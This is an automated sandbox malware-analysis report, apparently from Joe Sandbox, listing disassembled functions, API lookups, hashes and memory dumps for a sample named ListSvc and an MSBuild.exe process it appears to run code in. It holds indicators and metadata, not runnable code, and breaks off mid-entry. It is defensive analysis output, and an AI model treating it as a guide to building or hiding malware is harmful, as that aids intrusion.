Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

GetSystemWow64DirectoryW, xrefs: 005C7498
kernel32.dll, xrefs: 005C749D

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 1646373207-1816364905
Opcode ID: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
Opcode Fuzzy Hash: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA

Uniqueness

Uniqueness Score: -1.00%

Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

ChangeWindowMessageFilter, xrefs: 005C8651
user32.dll, xrefs: 005C8656

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 1646373207-2498399450
Opcode ID: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
Opcode Fuzzy Hash: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94

Uniqueness

Uniqueness Score: -1.00%

Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C8829
ShutdownBlockReasonDestroy, xrefs: 005C8824

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: 3fbd28814d97db1a372840751324d8c3ac9be682008ec3644daf7441840e1d78
Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
Opcode Fuzzy Hash: 3fbd28814d97db1a372840751324d8c3ac9be682008ec3644daf7441840e1d78
Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8

Uniqueness

Uniqueness Score: -1.00%

Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

DisableProcessWindowsGhosting, xrefs: 006B9800
user32.dll, xrefs: 006B9805

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 1d0e836530d80ee037b6803170de1fe8933ba33f6b77be0c16a5e781bf2d5ad3
Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
Opcode Fuzzy Hash: 1d0e836530d80ee037b6803170de1fe8933ba33f6b77be0c16a5e781bf2d5ad3
Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 6392 Parent PID: 6368 MSBuild.exeCOMMON

Executed Functions

Function 02E318C0, Relevance: 1.8, Strings: 1, Instructions: 503COMMON

Download Yara Rule

Strings

", xrefs: 02E31B97

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: c6be351be4ce496b5b72c2ed1016916e788f16b1eff9414dcaafb1c9c88cca63
Instruction ID: 9f5cb1cf77e07cec6d7a196cc3dd3036de22eaf06d77d7b7c71fe8d8ce79af6d
Opcode Fuzzy Hash: c6be351be4ce496b5b72c2ed1016916e788f16b1eff9414dcaafb1c9c88cca63
Instruction Fuzzy Hash: FD02CE30B442058FCB0ADFA9C494BAEBBF2EF88316F14D569D4099F295DB30D942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E32298, Relevance: 1.6, Instructions: 1618COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6265881936b08b60282399fbf412289fd7cf9b3af96c44812ad0d7ddc126bc1c
Instruction ID: 91d38f463015f7d33d291505e676c0200dbe54b7337ee87ddd9d5df6f576bff9
Opcode Fuzzy Hash: 6265881936b08b60282399fbf412289fd7cf9b3af96c44812ad0d7ddc126bc1c
Instruction Fuzzy Hash: 85E2A031E102599BDB22EF61CC98BD9B776EF99304F518A94E5083B295CF706AC1CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02E32288, Relevance: 1.6, Instructions: 1593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e6745f12ac92fe37c4f51616aaf5ce278de9bd346c29dc6e0fde357542a1b7
Instruction ID: cce611821fc3cd80c45a6972a613f7dc7af51b827d7f9a606a93f7cec2433f2a
Opcode Fuzzy Hash: f9e6745f12ac92fe37c4f51616aaf5ce278de9bd346c29dc6e0fde357542a1b7
Instruction Fuzzy Hash: 89E2AF31E502599BDB22EF61CC98BD9B776EF99304F518A94E5083B294CF706AC1CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02E34B70, Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57b6e57aeacd46fd5124dde5b1793b0512692b4746a36c12d372a1e67d6666c9
Instruction ID: f7fd2fb0717d8059c12942e2c5d379c67c88a5202842c3ffd4dd34ac420f8c35
Opcode Fuzzy Hash: 57b6e57aeacd46fd5124dde5b1793b0512692b4746a36c12d372a1e67d6666c9
Instruction Fuzzy Hash: 6A426B34640604CFCB15DF68C588BAA7BF2BF88305F85C969E5068B265DB35ED85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E34150, Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8d64239a5a20fe00e8ca76db9e91c727fdb08c2f3e5ead7e617fcf235efd27
Instruction ID: 0c5d31436a1dae9daf4e3c68a2e1ed30545a35067ca11930229c0374a1b11602
Opcode Fuzzy Hash: ad8d64239a5a20fe00e8ca76db9e91c727fdb08c2f3e5ead7e617fcf235efd27
Instruction Fuzzy Hash: 8F12D030A04249DFCB11CF69D884A9EBBF6FF89315F05C969E4459B2A1D730ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E35E48, Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abe15b91f6055ed3e7f859c84a790d38bf7e4d86950f3fbb357b279e098f0a1
Instruction ID: 67d239f5ca2da25e9f185b6386ca56772566e58c371d811cb961a0cfbc592f1e
Opcode Fuzzy Hash: 4abe15b91f6055ed3e7f859c84a790d38bf7e4d86950f3fbb357b279e098f0a1
Instruction Fuzzy Hash: E4F1AD30B40214AFDB25DF75C998BAEB7F6BF8830AF15D529D9099B294CB31E841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E3547C, Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5089b7d878b9765872b1d9f3140c330250b3eaf389add417859e67043ecce77
Instruction ID: 8ff4f6091fe9507bbf467c94b54ebea7304d0bbd58ce13a9f11c568f849d3d76
Opcode Fuzzy Hash: e5089b7d878b9765872b1d9f3140c330250b3eaf389add417859e67043ecce77
Instruction Fuzzy Hash: 1121E730A482548FDB16EBB5C9547EE7BF6AF8D208F548968C405F7384DB349901CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E30C62, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759b0f2dc4be8218a5e4cc36656c35462977dd335260b1746b2f70db58440d1e
Instruction ID: 015e60cacec1fd6d691213c6ebc21c98840301a6c2a0bd4bc574eb1be5144ae8
Opcode Fuzzy Hash: 759b0f2dc4be8218a5e4cc36656c35462977dd335260b1746b2f70db58440d1e
Instruction Fuzzy Hash: 72918071E40218DFCB05DFE1D854AEEBBFAAF88344F14852AE505E7254DB30A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E31EC0, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ce7354e8c915a5316ae23f2315d46d0fc9a788df25832712596c6e699404ac
Instruction ID: 79506340d0588017399de55dcfee939c068bb6698c49d8f584ba67ffdb0f8d2f
Opcode Fuzzy Hash: e8ce7354e8c915a5316ae23f2315d46d0fc9a788df25832712596c6e699404ac
Instruction Fuzzy Hash: AC71C730B402059FDB15DB61C944BAFB7F6AF88749F148528EA06DB384DB74EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E36230, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322fc9da276c5b2415b9d9ffebd3781ee5ad8c51542b50848c852861ce10047e
Instruction ID: 358e91e35bf1d5f29b9817255fcc668482b6b706d8d166cdc18eb4da8f3c309e
Opcode Fuzzy Hash: 322fc9da276c5b2415b9d9ffebd3781ee5ad8c51542b50848c852861ce10047e
Instruction Fuzzy Hash: C5618B30B40224AFCB05DF65D898BAEBBF6BF88715F158569E905EB294CB30DC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02E313C8, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b6b729dd191b28d601bc586f46977599c83bfbfd1b40ec6523a8504f2fdb277
Instruction ID: b15fa16f0f2552e7e66b32c37ef816ad72a2897a9c3e5312705f01ea310a0bde
Opcode Fuzzy Hash: 2b6b729dd191b28d601bc586f46977599c83bfbfd1b40ec6523a8504f2fdb277
Instruction Fuzzy Hash: 5751BF71E002589FCB15EBB9D8146EEBBB6EFC5311F04C8BAD509DB250EB344A16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E33E48, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd435fcfcb50087da2851aca62e37e0a2c8beb775c348503c6378c79b9e9b510
Instruction ID: 7a7c426550f7a2299b6a4de30d6f5a44c7733a7eedcbe271617ece6b00c5bcfb
Opcode Fuzzy Hash: fd435fcfcb50087da2851aca62e37e0a2c8beb775c348503c6378c79b9e9b510
Instruction Fuzzy Hash: C8518B35A00229DFCB12CF9AD844AEEFBF1BF49316F0591A6E854E7290D734A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E30448, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c7afef97f631566b93e156521c4e60f64000528eef096200d7347ed296a1c5
Instruction ID: 607b93bf7686c743d8ce6e29824e98503de13cc9a4e172f6be643ef52c2bc920
Opcode Fuzzy Hash: 55c7afef97f631566b93e156521c4e60f64000528eef096200d7347ed296a1c5
Instruction Fuzzy Hash: 3541B130E44248DFCB40EFB8D5547DE77F6AF84308F108969E1049B365DB349846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E31872, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b13564e20fd36f2935b8fd2e4ff4983f5ff4032b98180c7b995ce13dfb9cac5
Instruction ID: 1909e26f5765068ea5a6f931f04a3e12b08ab0ffe751a693ffb145fe295b5460
Opcode Fuzzy Hash: 3b13564e20fd36f2935b8fd2e4ff4983f5ff4032b98180c7b995ce13dfb9cac5
Instruction Fuzzy Hash: 86418E34A40105DFCB05EF65D858AAF7BF6EF89356B04CA69E405CB264EB30AD06CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02E33FE8, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7a79c381cac5523a8a1f722c865f12e5ff8366e2047b77055f84f649f4749e
Instruction ID: ebc262e40e0b72efb1893f95811b56176c5d89fd69d257f8af17b7c3078bbea1
Opcode Fuzzy Hash: 5f7a79c381cac5523a8a1f722c865f12e5ff8366e2047b77055f84f649f4749e
Instruction Fuzzy Hash: 99314B327483518BCB268AA880541FEFBE79F9D115F08D569C542EB385DB719888CBE3

Uniqueness

Uniqueness Score: -1.00%

Function 02E3471E, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2deb37e102296bc54f05992c84e55542440b11ffd930ae17d9eeb2331af8b6
Instruction ID: 010fdd005936822a6dfc46c9b318f3db95f67bc986c740ae8fecb01f0420d2bb
Opcode Fuzzy Hash: 3f2deb37e102296bc54f05992c84e55542440b11ffd930ae17d9eeb2331af8b6
Instruction Fuzzy Hash: 3231AF75B40154CFCB05DF78D498AAE73B2AF88329B248669E116DB3A4CB70DC02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E36469, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d23297a774b9a9a56011f88f9e70016bd1c5c9bac4259141bf29700556bd030f
Instruction ID: 505b35d39c306d790b3b634e2ccabf51a39566b5c1987bb6b3827b03324fb8de
Opcode Fuzzy Hash: d23297a774b9a9a56011f88f9e70016bd1c5c9bac4259141bf29700556bd030f
Instruction Fuzzy Hash: 9021F431F002589FC715EB789858AAF7BBAEFC5326F0084A9D405DB295DB308C16CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E34B60, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1352b4553af9e6c136f63f64ed585ab0a01dd2535272be6c5fb1c746353fc368
Instruction ID: 314de13eb37f1575a4a76e4e474ee8ac5bca0250aca9565acf27c099e59f73b4
Opcode Fuzzy Hash: 1352b4553af9e6c136f63f64ed585ab0a01dd2535272be6c5fb1c746353fc368
Instruction Fuzzy Hash: CB218035A80200CFD715DF65D898BAB7BE6AF88356F85D869D405CB291C735C845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E30439, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588a5f3bc2e4e8f13e5563e5d4bd0ce09dbd34e22cae3a31744aea76a5dbc277
Instruction ID: f139918b4695bc106bdd63d4ae9666898d2ef165faa6232e56b6b49132790659
Opcode Fuzzy Hash: 588a5f3bc2e4e8f13e5563e5d4bd0ce09dbd34e22cae3a31744aea76a5dbc277
Instruction Fuzzy Hash: 68318F34940249DFCB51EFE8E154ADDBBF6BF84308F04C969E0045B265DB759886CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E31768, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab909c76bdd00bab3f064c23cc78a1a12be8faa5c033482fe6cda72044f6f6ca
Instruction ID: 0d9778b2cf5853b922cafb5d5e181e9aa3a8d4266f84fb636cecb0f92cd31732
Opcode Fuzzy Hash: ab909c76bdd00bab3f064c23cc78a1a12be8faa5c033482fe6cda72044f6f6ca
Instruction Fuzzy Hash: 0F216B71B042148FCB44EF78D55896E77F2AF8960972248A8E50ADF3A1EB31EC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02E31778, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1eb3ddc09ef374bead39830aa45515b1e929e55c6234a732012d2f5820b361
Instruction ID: f9f7a152881ae4089f59612cfe10d26820a3c72c203d972e357aec82e10c2a6b
Opcode Fuzzy Hash: df1eb3ddc09ef374bead39830aa45515b1e929e55c6234a732012d2f5820b361
Instruction Fuzzy Hash: 74214C70B042148FCB44EF78D55896E77F2AF89709B2248A9D506DF3A1EB31ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E34498, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e0e68fa5077a17347ddc67c2821b73d9b21b5fe8e5dd133b54866003de007c
Instruction ID: b2d822e9a5a900d9bd7754b99bd6c28f8f4fc604998ca4cc00b2e0863fd1b9ff
Opcode Fuzzy Hash: d1e0e68fa5077a17347ddc67c2821b73d9b21b5fe8e5dd133b54866003de007c
Instruction Fuzzy Hash: 0D11B932B006409FC725DF29E888B97B7E7AFC130AF45CA69C15587291DB71EC05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E344A8, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdae38e30491524b8ab412efb4a7e187a26bc0b1a3f212fc914763122a589048
Instruction ID: ec5830ea528560abfc6b04abd94a96695684a0b06f799d7f039c7761da66f80b
Opcode Fuzzy Hash: fdae38e30491524b8ab412efb4a7e187a26bc0b1a3f212fc914763122a589048
Instruction Fuzzy Hash: 2C11A332B406009FC725DF2AE988B97B7E7AFC031AB41CA29D1198B291DB71E805CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E3536C, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de336aa793ff455120a71158a6b98e7e4988811d1b32c31b9e73718f18fe02dc
Instruction ID: 4fc3c886a0be0efdcf7449049f6fab280fbce10e9793f4c29ae4dc3a17b64f95
Opcode Fuzzy Hash: de336aa793ff455120a71158a6b98e7e4988811d1b32c31b9e73718f18fe02dc
Instruction Fuzzy Hash: 8301C071E482889FCB08DBB9D8585AE7BF1EF8D309B0085E9E506CB275DB309D01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02E30699, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05da7f83ad2a47a443878eb2c47e2aaae4f784ce5e1ab610753cabddf8188ee
Instruction ID: fe3dff1d98c38cae1bccd4af0615430faff5c07c26f647a58e53d77ec4835922
Opcode Fuzzy Hash: e05da7f83ad2a47a443878eb2c47e2aaae4f784ce5e1ab610753cabddf8188ee
Instruction Fuzzy Hash: 640128307CD3A54FCB056775E51836B3BD29FD228DB0509A9E642CB6C6EF64D842C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02E306A8, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
